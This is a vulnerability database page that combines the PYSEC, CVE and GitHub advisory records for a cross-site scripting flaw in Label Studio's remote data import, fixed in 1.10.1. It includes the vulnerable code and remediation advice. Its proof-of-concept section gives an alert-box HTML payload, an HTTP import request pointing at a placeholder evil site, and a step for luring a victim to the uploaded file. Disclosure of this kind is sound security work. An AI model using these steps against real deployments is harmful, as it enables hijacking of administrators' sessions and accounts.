PYSEC-2024-128

Vulnerability from pysec - Published: 2024-01-24 00:15 - Updated: 2024-11-21 14:22

Details

data_import/uploader.py lines 125C5 through 146 showed that if a URL passed the server side request forgery verification checks, the contents of the file would be downloaded using the filename in the URL. The downloaded file path could then be retrieved by sending a request to /api/projects/{project_id}/file-uploads?ids=[{download_id}] where {project_id} was the ID of the project and {download_id} was the ID of the downloaded file. Once the downloaded file path was retrieved by the previous API endpoint, data_import/api.pylines 595C1 through 616C62 demonstrated that the Content-Type of the response was determined by the file extension, since mimetypes.guess_type guesses the Content-Type based on the file extension. Since the Content-Type was determined by the file extension of the downloaded file, an attacker could import in a .html file that would execute JavaScript when visited.

Version 1.10.1 contains a patch for this issue. Other remediation strategies are also available. For all user provided files that are downloaded by Label Studio, set the Content-Security-Policy: sandbox; response header when viewed on the site. The sandbox directive restricts a page's actions to prevent popups, execution of plugins and scripts and enforces a same-origin policy. Alternatively, restrict the allowed file extensions that may be downloaded.

Severity ?

6.1 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Impacted products

Name	purl
label-studio	pkg:pypi/label-studio

Aliases

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "label-studio",
        "purl": "pkg:pypi/label-studio"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.10.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "0.4.1",
        "0.4.2",
        "0.4.3",
        "0.4.4",
        "0.4.4.post1",
        "0.4.4.post2",
        "0.4.5",
        "0.4.6",
        "0.4.6.post1",
        "0.4.6.post2",
        "0.4.7",
        "0.4.8",
        "0.5.0",
        "0.5.1",
        "0.6.0",
        "0.6.1",
        "0.7.0",
        "0.7.1",
        "0.7.2",
        "0.7.3",
        "0.7.4",
        "0.7.4.post0",
        "0.7.4.post1",
        "0.7.5.post1",
        "0.7.5.post2",
        "0.8.0",
        "0.8.0.post0",
        "0.8.1",
        "0.8.1.post0",
        "0.8.2",
        "0.8.2.post0",
        "0.9.0",
        "0.9.0.post2",
        "0.9.0.post3",
        "0.9.0.post4",
        "0.9.0.post5",
        "0.9.1",
        "0.9.1.post0",
        "0.9.1.post1",
        "0.9.1.post2",
        "1.0.0",
        "1.0.0.post0",
        "1.0.0.post1",
        "1.0.0.post2",
        "1.0.0.post3",
        "1.0.1",
        "1.0.2",
        "1.0.2.post0",
        "1.1.0",
        "1.1.0rc0",
        "1.1.1",
        "1.10.0",
        "1.10.0.post0",
        "1.2",
        "1.3",
        "1.3.post0",
        "1.3.post1",
        "1.4",
        "1.4.1",
        "1.4.1.post0",
        "1.4.1.post1",
        "1.5.0",
        "1.5.0.post0",
        "1.6.0",
        "1.7.0",
        "1.7.1",
        "1.7.2",
        "1.7.3",
        "1.8.0",
        "1.8.1",
        "1.8.2",
        "1.8.2.post0",
        "1.8.2.post1",
        "1.9.0",
        "1.9.1",
        "1.9.1.post0",
        "1.9.2",
        "1.9.2.post0"
      ]
    }
  ],
  "aliases": [
    "CVE-2024-23633",
    "GHSA-fq23-g58m-799r"
  ],
  "details": "Label Studio, an open source data labeling tool had a remote import feature allowed users to import data from a remote web source, that was downloaded and could be viewed on the website. Prior to version 1.10.1, this feature could had been abused to download a HTML file that executed malicious JavaScript code in the context of the Label Studio website. Executing arbitrary JavaScript could result in an attacker performing malicious actions on Label Studio users if they visit the crafted avatar image. For an example, an attacker can craft a JavaScript payload that adds a new Django Super Administrator user if a Django administrator visits the image.\n\n`data_import/uploader.py` lines 125C5 through 146 showed that if a URL passed the server side request forgery verification checks, the contents of the file would be downloaded using the filename in the URL. The downloaded file path could then be retrieved by sending a request to `/api/projects/{project_id}/file-uploads?ids=[{download_id}]` where `{project_id}` was the ID of the project and `{download_id}` was the ID of the downloaded file. Once the downloaded file path was retrieved by the previous API endpoint, `data_import/api.py`lines 595C1 through 616C62 demonstrated that the `Content-Type` of the response was determined by the file extension, since `mimetypes.guess_type` guesses the `Content-Type` based on the file extension. Since the `Content-Type` was determined by the file extension of the downloaded file, an attacker could import in a `.html` file that would execute JavaScript when visited.\n\nVersion 1.10.1 contains a patch for this issue. Other remediation strategies are also available. For all user provided files that are downloaded by Label Studio, set the `Content-Security-Policy: sandbox;` response header when viewed on the site. The `sandbox` directive restricts a page\u0027s actions to prevent popups, execution of plugins and scripts and enforces a `same-origin` policy. Alternatively, restrict the allowed file extensions that may be downloaded.",
  "id": "PYSEC-2024-128",
  "modified": "2024-11-21T14:22:53.406222+00:00",
  "published": "2024-01-24T00:15:00+00:00",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://github.com/HumanSignal/label-studio/security/advisories/GHSA-fq23-g58m-799r"
    },
    {
      "type": "WEB",
      "url": "https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/sandbox"
    },
    {
      "type": "WEB",
      "url": "https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/api.py#L595C1-L616C62"
    },
    {
      "type": "WEB",
      "url": "https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/uploader.py#L125C5-L146"
    }
  ],
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

CVE-2024-23633 (GCVE-0-2024-23633)

Vulnerability from cvelistv5 – Published: 2024-01-23 23:15 – Updated: 2024-11-13 15:24

Title

Label Studio XSS Vulnerability on Data Import

Summary

Label Studio, an open source data labeling tool had a remote import feature allowed users to import data from a remote web source, that was downloaded and could be viewed on the website. Prior to version 1.10.1, this feature could had been abused to download a HTML file that executed malicious JavaScript code in the context of the Label Studio website. Executing arbitrary JavaScript could result in an attacker performing malicious actions on Label Studio users if they visit the crafted avatar image. For an example, an attacker can craft a JavaScript payload that adds a new Django Super Administrator user if a Django administrator visits the image. `data_import/uploader.py` lines 125C5 through 146 showed that if a URL passed the server side request forgery verification checks, the contents of the file would be downloaded using the filename in the URL. The downloaded file path could then be retrieved by sending a request to `/api/projects/{project_id}/file-uploads?ids=[{download_id}]` where `{project_id}` was the ID of the project and `{download_id}` was the ID of the downloaded file. Once the downloaded file path was retrieved by the previous API endpoint, `data_import/api.py`lines 595C1 through 616C62 demonstrated that the `Content-Type` of the response was determined by the file extension, since `mimetypes.guess_type` guesses the `Content-Type` based on the file extension. Since the `Content-Type` was determined by the file extension of the downloaded file, an attacker could import in a `.html` file that would execute JavaScript when visited. Version 1.10.1 contains a patch for this issue. Other remediation strategies are also available. For all user provided files that are downloaded by Label Studio, set the `Content-Security-Policy: sandbox;` response header when viewed on the site. The `sandbox` directive restricts a page's actions to prevent popups, execution of plugins and scripts and enforces a `same-origin` policy. Alternatively, restrict the allowed file extensions that may be downloaded.

Severity ?

4.7 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N

CWE

CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Assigner

GitHub_M

References

URL

Tags

	https://github.com/HumanSignal/label-studio/secur…	x_refsource_CONFIRM
	https://developer.mozilla.org/en-US/docs/Web/HTTP…	x_refsource_MISC
	https://github.com/HumanSignal/label-studio/blob/…	x_refsource_MISC
	https://github.com/HumanSignal/label-studio/blob/…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	HumanSignal	label-studio	Affected: < 1.10.1

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-01T23:06:25.341Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "https://github.com/HumanSignal/label-studio/security/advisories/GHSA-fq23-g58m-799r",
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://github.com/HumanSignal/label-studio/security/advisories/GHSA-fq23-g58m-799r"
          },
          {
            "name": "https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/sandbox",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/sandbox"
          },
          {
            "name": "https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/api.py#L595C1-L616C62",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/api.py#L595C1-L616C62"
          },
          {
            "name": "https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/uploader.py#L125C5-L146",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/uploader.py#L125C5-L146"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-23633",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-11-13T15:23:54.398837Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-11-13T15:24:01.901Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "label-studio",
          "vendor": "HumanSignal",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 1.10.1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Label Studio, an open source data labeling tool had a remote import feature allowed users to import data from a remote web source, that was downloaded and could be viewed on the website. Prior to version 1.10.1, this feature could had been abused to download a HTML file that executed malicious JavaScript code in the context of the Label Studio website. Executing arbitrary JavaScript could result in an attacker performing malicious actions on Label Studio users if they visit the crafted avatar image. For an example, an attacker can craft a JavaScript payload that adds a new Django Super Administrator user if a Django administrator visits the image.\n\n`data_import/uploader.py` lines 125C5 through 146 showed that if a URL passed the server side request forgery verification checks, the contents of the file would be downloaded using the filename in the URL. The downloaded file path could then be retrieved by sending a request to `/api/projects/{project_id}/file-uploads?ids=[{download_id}]` where `{project_id}` was the ID of the project and `{download_id}` was the ID of the downloaded file. Once the downloaded file path was retrieved by the previous API endpoint, `data_import/api.py`lines 595C1 through 616C62 demonstrated that the `Content-Type` of the response was determined by the file extension, since `mimetypes.guess_type` guesses the `Content-Type` based on the file extension. Since the `Content-Type` was determined by the file extension of the downloaded file, an attacker could import in a `.html` file that would execute JavaScript when visited.\n\nVersion 1.10.1 contains a patch for this issue. Other remediation strategies are also available. For all user provided files that are downloaded by Label Studio, set the `Content-Security-Policy: sandbox;` response header when viewed on the site. The `sandbox` directive restricts a page\u0027s actions to prevent popups, execution of plugins and scripts and enforces a `same-origin` policy. Alternatively, restrict the allowed file extensions that may be downloaded."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 4.7,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-79",
              "description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-01-23T23:15:09.044Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/HumanSignal/label-studio/security/advisories/GHSA-fq23-g58m-799r",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/HumanSignal/label-studio/security/advisories/GHSA-fq23-g58m-799r"
        },
        {
          "name": "https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/sandbox",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/sandbox"
        },
        {
          "name": "https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/api.py#L595C1-L616C62",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/api.py#L595C1-L616C62"
        },
        {
          "name": "https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/uploader.py#L125C5-L146",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/uploader.py#L125C5-L146"
        }
      ],
      "source": {
        "advisory": "GHSA-fq23-g58m-799r",
        "discovery": "UNKNOWN"
      },
      "title": " Label Studio XSS Vulnerability on Data Import"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2024-23633",
    "datePublished": "2024-01-23T23:15:09.044Z",
    "dateReserved": "2024-01-19T00:18:53.232Z",
    "dateUpdated": "2024-11-13T15:24:01.901Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

GHSA-FQ23-G58M-799R

Vulnerability from github – Published: 2024-01-24 14:21 – Updated: 2024-11-22 18:20

Summary

Cross-site Scripting Vulnerability on Data Import

Details

Introduction

This write-up describes a vulnerability found in Label Studio, a popular open source data labeling tool. The vulnerability affects all versions of Label Studio prior to 1.10.1 and was tested on version 1.9.2.post0.

Overview

Label Studio had a remote import feature allowed users to import data from a remote web source, that was downloaded and could be viewed on the website. This feature could had been abused to download a HTML file that executed malicious JavaScript code in the context of the Label Studio website.

Description

The following code snippet in Label Studio showed that is a URL passed the SSRF verification checks, the contents of the file would be downloaded using the filename in the URL.

def tasks_from_url(file_upload_ids, project, user, url, could_be_tasks_list):
    """Download file using URL and read tasks from it"""
    # process URL with tasks
    try:
        filename = url.rsplit('/', 1)[-1] <1>

        response = ssrf_safe_get(
            url, verify=project.organization.should_verify_ssl_certs(), stream=True, headers={'Accept-Encoding': None}
        )
        file_content = response.content
        check_tasks_max_file_size(int(response.headers['content-length']))
        file_upload = create_file_upload(user, project, SimpleUploadedFile(filename, file_content))
        if file_upload.format_could_be_tasks_list:
            could_be_tasks_list = True
        file_upload_ids.append(file_upload.id)
        tasks, found_formats, data_keys = FileUpload.load_tasks_from_uploaded_files(project, file_upload_ids)

    except ValidationError as e:
        raise e
    except Exception as e:
        raise ValidationError(str(e))
    return data_keys, found_formats, tasks, file_upload_ids, could_be_tasks_list

The file name that was set was retrieved from the URL.

The downloaded file path could then be retrieved by sending a request to /api/projects/{project_id}/file-uploads?ids=[{download_id}] where {project_id} was the ID of the project and {download_id} was the ID of the downloaded file. Once the downloaded file path was retrieved by the previous API endpoint, the following code snippet demonstrated that the Content-Type of the response was determined by the file extension, since mimetypes.guess_type guesses the Content-Type based on the file extension.

class UploadedFileResponse(generics.RetrieveAPIView):
    permission_classes = (IsAuthenticated,)

    @swagger_auto_schema(auto_schema=None)
    def get(self, *args, **kwargs):
        request = self.request
        filename = kwargs['filename']
        # XXX needed, on windows os.path.join generates '\' which breaks FileUpload
        file = settings.UPLOAD_DIR + ('/' if not settings.UPLOAD_DIR.endswith('/') else '') + filename
        logger.debug(f'Fetch uploaded file by user {request.user} => {file}')
        file_upload = FileUpload.objects.filter(file=file).last()

        if not file_upload.has_permission(request.user):
            return Response(status=status.HTTP_403_FORBIDDEN)

        file = file_upload.file
        if file.storage.exists(file.name):
            content_type, encoding = mimetypes.guess_type(str(file.name)) <1>
            content_type = content_type or 'application/octet-stream'
            return RangedFileResponse(request, file.open(mode='rb'), content_type=content_type)
        else:
            return Response(status=status.HTTP_404_NOT_FOUND)

Determines the Content-Type based on the extension of the uploaded file by using mimetypes.guess_type.

Since the Content-Type was determined by the file extension of the downloaded file, an attacker could import in a .html file that would execute JavaScript when visited.

Proof of Concept

Below were the steps to recreate this issue:

Host the following HTML proof of concept (POC) script on an external website with the file extension .html that would be downloaded to the Label Studio website.

<html>
    <body>
        <h1>Data Import XSS</h1>
        <script>
            alert(document.domain);
        </script>
    </body>
</html>

Send the following POST request to download the HTML POC to the Label Studio and note the returned ID of the downloaded file in the response. In the following POC the {victim_host} is the address and port of the victim Label Studio website (eg. labelstudio.com:8080), {project_id} is the ID of the project where the data would be imported into, {cookies} are session cookies and {evil_site} is the website hosting the malicious HTML file (named xss.html in the following example).

POST /api/projects/{project_id}/import?commit_to_project=false HTTP/1.1
Host: {victim_host}
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
content-type: application/x-www-form-urlencoded
Content-Length: 43
Connection: close
Cookie: {cookies}
Pragma: no-cache
Cache-Control: no-cache

url=https://{evil_site}/xss.html

To retrieve the downloaded file path could be retrieved by sending a GET request to /api/projects/{project_id}/file-uploads?ids=[{download_id}], where {download_id} is the ID of the file download from the previous step.
Send your victim a link to /data/{file_path}, where {file_path} is the path of the downloaded file from the previous step. The following screenshot demonstrated executing the POC JavaScript code by visiting /data/upload/1/cfcfc340-xss.html.

xss-import-alert

Impact

Executing arbitrary JavaScript could result in an attacker performing malicious actions on Label Studio users if they visit the crafted avatar image. For an example, an attacker can craft a JavaScript payload that adds a new Django Super Administrator user if a Django administrator visits the image.

Remediation Advice

For all user provided files that are downloaded by Label Studio, set the Content-Security-Policy: sandbox; response header when viewed on the site. The sandbox directive restricts a page's actions to prevent popups, execution of plugins and scripts and enforces a same-origin policy (documentation).
Restrict the allowed file extensions that could be downloaded.

Discovered

August 2023, Alex Brown, elttam

Severity ?

4.7 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "label-studio"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.10.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-23633"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-01-24T14:21:47Z",
    "nvd_published_at": "2024-01-24T00:15:08Z",
    "severity": "MODERATE"
  },
  "details": "# Introduction\n\nThis write-up describes a vulnerability found in [Label Studio](https://github.com/HumanSignal/label-studio), a popular open source data labeling tool. The vulnerability affects all versions of Label Studio prior to `1.10.1` and was tested on version `1.9.2.post0`.\n\n# Overview\n\n[Label Studio](https://github.com/HumanSignal/label-studio) had a remote import feature allowed users to import data from a remote web source, that was downloaded and could be viewed on the website. This feature could had been abused to download a HTML file that executed malicious JavaScript code in the context of the Label Studio website.\n\n# Description\n\nThe following [code snippet in Label Studio](https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/uploader.py#L125C5-L146) showed that is a URL passed the SSRF verification checks, the contents of the file would be downloaded using the filename in the URL.\n\n```python\ndef tasks_from_url(file_upload_ids, project, user, url, could_be_tasks_list):\n    \"\"\"Download file using URL and read tasks from it\"\"\"\n    # process URL with tasks\n    try:\n        filename = url.rsplit(\u0027/\u0027, 1)[-1] \u003c1\u003e\n\n        response = ssrf_safe_get(\n            url, verify=project.organization.should_verify_ssl_certs(), stream=True, headers={\u0027Accept-Encoding\u0027: None}\n        )\n        file_content = response.content\n        check_tasks_max_file_size(int(response.headers[\u0027content-length\u0027]))\n        file_upload = create_file_upload(user, project, SimpleUploadedFile(filename, file_content))\n        if file_upload.format_could_be_tasks_list:\n            could_be_tasks_list = True\n        file_upload_ids.append(file_upload.id)\n        tasks, found_formats, data_keys = FileUpload.load_tasks_from_uploaded_files(project, file_upload_ids)\n\n    except ValidationError as e:\n        raise e\n    except Exception as e:\n        raise ValidationError(str(e))\n    return data_keys, found_formats, tasks, file_upload_ids, could_be_tasks_list\n```\n1. The file name that was set was retrieved from the URL.\n\nThe downloaded file path could then be retrieved by sending a request to `/api/projects/{project_id}/file-uploads?ids=[{download_id}]` where `{project_id}` was the ID of the project and `{download_id}` was the ID of the downloaded file. Once the downloaded file path was retrieved by the previous API endpoint, the [following code snippet](https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/api.py#L595C1-L616C62) demonstrated that the `Content-Type` of the response was determined by the file extension, since `mimetypes.guess_type` guesses the `Content-Type` based on the file extension.\n\n```python\nclass UploadedFileResponse(generics.RetrieveAPIView):\n    permission_classes = (IsAuthenticated,)\n\n    @swagger_auto_schema(auto_schema=None)\n    def get(self, *args, **kwargs):\n        request = self.request\n        filename = kwargs[\u0027filename\u0027]\n        # XXX needed, on windows os.path.join generates \u0027\\\u0027 which breaks FileUpload\n        file = settings.UPLOAD_DIR + (\u0027/\u0027 if not settings.UPLOAD_DIR.endswith(\u0027/\u0027) else \u0027\u0027) + filename\n        logger.debug(f\u0027Fetch uploaded file by user {request.user} =\u003e {file}\u0027)\n        file_upload = FileUpload.objects.filter(file=file).last()\n\n        if not file_upload.has_permission(request.user):\n            return Response(status=status.HTTP_403_FORBIDDEN)\n\n        file = file_upload.file\n        if file.storage.exists(file.name):\n            content_type, encoding = mimetypes.guess_type(str(file.name)) \u003c1\u003e\n            content_type = content_type or \u0027application/octet-stream\u0027\n            return RangedFileResponse(request, file.open(mode=\u0027rb\u0027), content_type=content_type)\n        else:\n            return Response(status=status.HTTP_404_NOT_FOUND)\n```\n1. Determines the `Content-Type` based on the extension of the uploaded file by using `mimetypes.guess_type`.\n\nSince the `Content-Type` was determined by the file extension of the downloaded file, an attacker could import in a `.html` file that would execute JavaScript when visited.\n\n# Proof of Concept\n\nBelow were the steps to recreate this issue:\n\n1. Host the following HTML proof of concept (POC) script on an external website with the file extension `.html` that would be downloaded to the Label Studio website.\n\n```html\n\u003chtml\u003e\n    \u003cbody\u003e\n        \u003ch1\u003eData Import XSS\u003c/h1\u003e\n        \u003cscript\u003e\n            alert(document.domain);\n        \u003c/script\u003e\n    \u003c/body\u003e\n\u003c/html\u003e\n```\n\n2. Send the following `POST` request to download the HTML POC to the Label Studio and note the returned ID of the downloaded file in the response. In the following POC the `{victim_host}` is the address and port of the victim Label Studio website (eg. `labelstudio.com:8080`), `{project_id}` is the ID of the project where the data would be imported into, `{cookies}` are session cookies and `{evil_site}` is the website hosting the malicious HTML file (named `xss.html` in the following example).\n\n```http\nPOST /api/projects/{project_id}/import?commit_to_project=false HTTP/1.1\nHost: {victim_host}\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\ncontent-type: application/x-www-form-urlencoded\nContent-Length: 43\nConnection: close\nCookie: {cookies}\nPragma: no-cache\nCache-Control: no-cache\n\nurl=https://{evil_site}/xss.html\n```\n\n3. To retrieve the downloaded file path could be retrieved by sending a `GET` request to `/api/projects/{project_id}/file-uploads?ids=[{download_id}]`, where `{download_id}` is the ID of the file download from the previous step.\n\n4. Send your victim a link to `/data/{file_path}`, where `{file_path}` is the path of the downloaded file from the previous step. The following screenshot demonstrated executing the POC JavaScript code by visiting `/data/upload/1/cfcfc340-xss.html`.\n\n![xss-import-alert](https://user-images.githubusercontent.com/139727151/282223222-d8f9132c-838e-4aa6-9c03-a2bc83b4a409.png)\n\n# Impact\n\nExecuting arbitrary JavaScript could result in an attacker performing malicious actions on Label Studio users if they visit the crafted avatar image. For an example, an attacker can craft a JavaScript payload that adds a new Django Super Administrator user if a Django administrator visits the image.\n\n# Remediation Advice\n\n* For all user provided files that are downloaded by Label Studio, set the `Content-Security-Policy: sandbox;` response header when viewed on the site. The `sandbox` directive restricts a page\u0027s actions to prevent popups, execution of plugins and scripts and enforces a `same-origin` policy ([documentation](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/sandbox)).\n* Restrict the allowed file extensions that could be downloaded.\n\n# Discovered\n- August 2023, Alex Brown, elttam",
  "id": "GHSA-fq23-g58m-799r",
  "modified": "2024-11-22T18:20:58Z",
  "published": "2024-01-24T14:21:47Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/HumanSignal/label-studio/security/advisories/GHSA-fq23-g58m-799r"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23633"
    },
    {
      "type": "WEB",
      "url": "https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/sandbox"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/HumanSignal/label-studio"
    },
    {
      "type": "WEB",
      "url": "https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/api.py#L595C1-L616C62"
    },
    {
      "type": "WEB",
      "url": "https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/uploader.py#L125C5-L146"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/label-studio/PYSEC-2024-128.yaml"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Cross-site Scripting Vulnerability on Data Import"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

PYSEC-2024-128

CVE-2024-23633 (GCVE-0-2024-23633)

GHSA-FQ23-G58M-799R

Introduction

Overview

Description

Proof of Concept

Impact

Remediation Advice

Discovered

Tags

Sightings

Nomenclature